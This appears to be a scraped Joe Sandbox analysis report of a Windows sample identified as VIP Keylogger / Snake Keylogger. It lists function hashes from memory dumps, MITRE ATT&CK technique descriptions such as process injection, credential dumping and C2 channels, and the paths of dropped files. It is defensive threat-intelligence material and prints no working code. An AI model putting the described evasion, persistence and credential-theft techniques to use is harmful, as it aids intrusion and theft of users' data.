Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdbde7f29d2ad3d8db052c4beafedf670d7c1277f28636c968991afd1dd5691b
Instruction ID: 3e5165992aa225492ff380d1f2d4c2903ff2e7d8eb8bda2f9e2a45a95395add7
Opcode Fuzzy Hash: cdbde7f29d2ad3d8db052c4beafedf670d7c1277f28636c968991afd1dd5691b
Instruction Fuzzy Hash: 1221C135A002049FDB14EB68D450AEE7BB5FB9D360B50C129D91A9B350DB30EE86CBD1

Function 014FD554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3733643976.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_14fd000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed091dbc031afc5b71a094494bed539922d2bf4eec6781c9ffea5d3716c9b735
Instruction ID: 90e0eaef0b34010ca93eefa72c83adac04d3b5e6edefb948e1a27d4bb9b5c34f
Opcode Fuzzy Hash: ed091dbc031afc5b71a094494bed539922d2bf4eec6781c9ffea5d3716c9b735
Instruction Fuzzy Hash: FC2128B1904240DFEB15DF94D9C4B27BB65FB88314F24C56EEA090B366C336D456CAA2

Function 0161D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3734544995.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_161d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd08e172c8f99c7df9738089bf52b06e531720eb43dc013b6f4484bff78dfaa1
Instruction ID: 788f422b876f8e0501b0579513dd1e8f59cf9cfb77de1a534061de79e21cd7ed
Opcode Fuzzy Hash: fd08e172c8f99c7df9738089bf52b06e531720eb43dc013b6f4484bff78dfaa1
Instruction Fuzzy Hash: 972125B1504204DFDB15DF64CCC8B26BB61FB84314F28C56DE84A0B34AC736D847CA62

Function 056B6041 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7c255ea0806469e58eb969a7338de934e4383f22b3126a3718d83cd54a4390
Instruction ID: f14140fe6bb7d2da6c5686e3aa7eb948aa3a4515986257211c1309a5e9b17f6e
Opcode Fuzzy Hash: 2e7c255ea0806469e58eb969a7338de934e4383f22b3126a3718d83cd54a4390
Instruction Fuzzy Hash: 8021FD317042099FDB019F68D445AAB3BB2FB68301F00803AFA0A8B751CBB5CD95CBA1

Function 056B4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88373399d905cae894b376f84788a72249533c327df2f22658667443fa4b2bed
Instruction ID: a794e17e0458b274820826a967775a4aa7b112fb3ef676206a79757c6a607353
Opcode Fuzzy Hash: 88373399d905cae894b376f84788a72249533c327df2f22658667443fa4b2bed
Instruction Fuzzy Hash: 7C318274E11308CFCB54DFA8E59899DBBB2FF49301B2080A9E809AB324DB35AD41CF50

Function 056BF4D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb970aff1eafad01915164b9be68fcb7db0f46fcf58da9628f4c5e16dc97710
Instruction ID: 165490550929ce76afd80c917d4efaf53a56361eaf089e44b63f941973127184
Opcode Fuzzy Hash: cdb970aff1eafad01915164b9be68fcb7db0f46fcf58da9628f4c5e16dc97710
Instruction Fuzzy Hash: E0217FB0E003099FEB01DFA9E84479EBBF2FB45300F44C1AAC1549B259EBB45A45DB91

Function 056B6CF8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66197161a43d03542b629d2bd6e033390608db4d92179beb890d4fe022b8b6f
Instruction ID: 64d02f75365439e527b7687f300fe1b2dbcab8107d854b23d4f0ed33060d422d
Opcode Fuzzy Hash: e66197161a43d03542b629d2bd6e033390608db4d92179beb890d4fe022b8b6f
Instruction Fuzzy Hash: 3A11E1353006219FD7259A2ED464A3ABBA6FF89651709457DEA0ACB360CFB0DC42CB94

Function 056B27F0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01962617de8c79faa1af4ae3aa847d716b048441fd17e36570fdef28afe659bc
Instruction ID: 98f30b5ad0659e372cfd1f1a847a3a42581ddf4b3fb42010ae4672ccad73c885
Opcode Fuzzy Hash: 01962617de8c79faa1af4ae3aa847d716b048441fd17e36570fdef28afe659bc
Instruction Fuzzy Hash: 0121EFB4C152098FCB40DFA8D9555EEBFF1BB4A200F10816AE805B7220EB311A85CBA5

Function 014FD54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3733643976.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_14fd000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: cab513be1ea8344c6adddf7c409413ee090f814906ce7a3a0c3e3c01d49a6811
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 09119D76904280CFDB16CF54D5C4B16BF71FB88214F2485AAD9490A766C33AD456CBA2

Function 056BF4E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687ecbf56e6b352ef2ee2e3aded3f263a2255dca6c002a438797b3ae65546916
Instruction ID: fd6bab245a3a2dec7179509109d458be65c60ec0907615d7653958863798bc21
Opcode Fuzzy Hash: 687ecbf56e6b352ef2ee2e3aded3f263a2255dca6c002a438797b3ae65546916
Instruction Fuzzy Hash: 39113AB0E002099FEB40DFA9E98479EBBF2FB45300F44C5AAC1599B254EBB45A45CF91

Function 0161D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3734544995.000000000161D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0161D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_161d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: abcdf83d38dec7cbdd0a89be95123ccb74278fb572b53155cf23673de8996491
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: CE11BE75504244CFDB12CF54C9C4B15BB71FB44314F28C6A9D8494B756C33AD44ACF51

Function 056B688F Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7299ee75171c7fcbfe388f4e4dadf37ba095a0a256b33a93a2949011146c98a3
Instruction ID: 86d30eae04237ac54a635c6e40289010b98b2da029a13fe1e848088cd4213dd5
Opcode Fuzzy Hash: 7299ee75171c7fcbfe388f4e4dadf37ba095a0a256b33a93a2949011146c98a3
Instruction Fuzzy Hash: 9001B532F001146BEB119E59D800BEF3BA7EBD8690F18802AFA09C7380DA718856D7A4

Function 056BEB79 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b084ade81599154932c7029aa757e4e707ae4f87e08e0a881952e71e290aefe7
Instruction ID: 06eb2e92b0364fc2c790e4981fa173d613c3734e07cf3d04da102d8c41307f66
Opcode Fuzzy Hash: b084ade81599154932c7029aa757e4e707ae4f87e08e0a881952e71e290aefe7
Instruction Fuzzy Hash: B3113578E0020ADFDB40CFA8E8449EEBBB1FB89311F108166D915A3350D7785E66DF90

Function 056BF450 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3583cecd492a92e038b7d7c189eb6f3005a0cd6bfba03a665f0705f943ecde2
Instruction ID: 3312eecd536ce0b1a13b892501165eb93b6986b0ccea58fe3ddf77fe0a899ac1
Opcode Fuzzy Hash: f3583cecd492a92e038b7d7c189eb6f3005a0cd6bfba03a665f0705f943ecde2
Instruction Fuzzy Hash: 42F01770A11225CF8B94EB78C904AAEB7F1AF09220B1145A9E509DB322EA70D9018BD1

Function 056B28AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e463b411db07efaaa1e046d162974b9fbf19d84d94d64c7a8cb6d70e4de3ab9e
Instruction ID: dc639c5284246417d3045b5c52dd3034a489b7b8c233cdf6bb0d1f4a9aa56a10
Opcode Fuzzy Hash: e463b411db07efaaa1e046d162974b9fbf19d84d94d64c7a8cb6d70e4de3ab9e
Instruction Fuzzy Hash: 78E0C232D2032A978B10E6A9DC044EFBB38EE91220B904222D51033100EB30665DC2A0

Function 056B28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3d65f63fe94d8b23c3367685c75f6bd62a6a92b46d992b6ed04dc9f6153080
Instruction ID: 5173bff55ec8661dcf84086ce029f384702e65dc4f64c9eecc6a0c168bdb71ed
Opcode Fuzzy Hash: 1b3d65f63fe94d8b23c3367685c75f6bd62a6a92b46d992b6ed04dc9f6153080
Instruction Fuzzy Hash: 76D01231D2032A978B10A6A5DC044EEBB38EE95221B504626D51437144EB70665986A1

Function 056B712F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4dd96f0deef28244affdf18636c73ddb15cb34a19ee10fac8678c753cca424
Instruction ID: 4bc824f88d690fe3fea1c5850ba4a393a9ac0c29ae3d4d13dfa11d1422b702bc
Opcode Fuzzy Hash: ab4dd96f0deef28244affdf18636c73ddb15cb34a19ee10fac8678c753cca424
Instruction Fuzzy Hash: CCD02B3051C3092FC605A775FC457063B7DA7E6181B84856EE0CE06159EDBC184286A5

Function 056BB99D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3105c169a6047792a2ef5ac839a46869457456e76a57d34d22a92fde09ffa139
Instruction ID: ec453ca7d97215ed427c373f354b08b04eac8f1aeec07214019a4c157789478b
Opcode Fuzzy Hash: 3105c169a6047792a2ef5ac839a46869457456e76a57d34d22a92fde09ffa139
Instruction Fuzzy Hash: 25D0677AB501089FCB159F98E8419DDB776FB98221B048516F925A3260C6319D21EB64

Function 056B7140 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c11c8d9068f21572aa96769d5f83dcfa43c522d9819fc63214214e4a7bdb75
Instruction ID: 0764171eb44b5d44b54de7d0beedd43736a2958d9ecca08204b286d0ac45dd5d
Opcode Fuzzy Hash: 71c11c8d9068f21572aa96769d5f83dcfa43c522d9819fc63214214e4a7bdb75
Instruction Fuzzy Hash: 5CC022301103094BC100FB26FC08604333EF6D0101780C125E04A06118DEBC2C824AE0

Non-executed Functions

Function 056B7720 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 056B772C
\;q, xrefs: 056B7752
\;q, xrefs: 056B7736
\;q, xrefs: 056B775E

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 6c93a09477eb66f7e62e1d10a7738b60396a243d5affb15d655b0d20161177cb
Instruction ID: 594ead5788b649ba78abf78b06cfe92b22cab01e17603d39b12f7877f0bf3060
Opcode Fuzzy Hash: 6c93a09477eb66f7e62e1d10a7738b60396a243d5affb15d655b0d20161177cb
Instruction Fuzzy Hash: BB015A357045158FA724CE29C454EA573E7FBC9762729427AE403CB3A1EAA0DC82CB90

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Autofill Manufacturing Sdn Bhd 28-08-2024.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GhrKoSGuCdvpJ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0gaiz3yh.3nb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ed1eyoy.dbh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hy4umc5.uqy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtxhfwmy.4jf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt3cnewh.wog.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lobd44dl.mhw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmlenjg4.p34.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxkjhyeq.kuf.ps1

Windows Analysis Report
Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre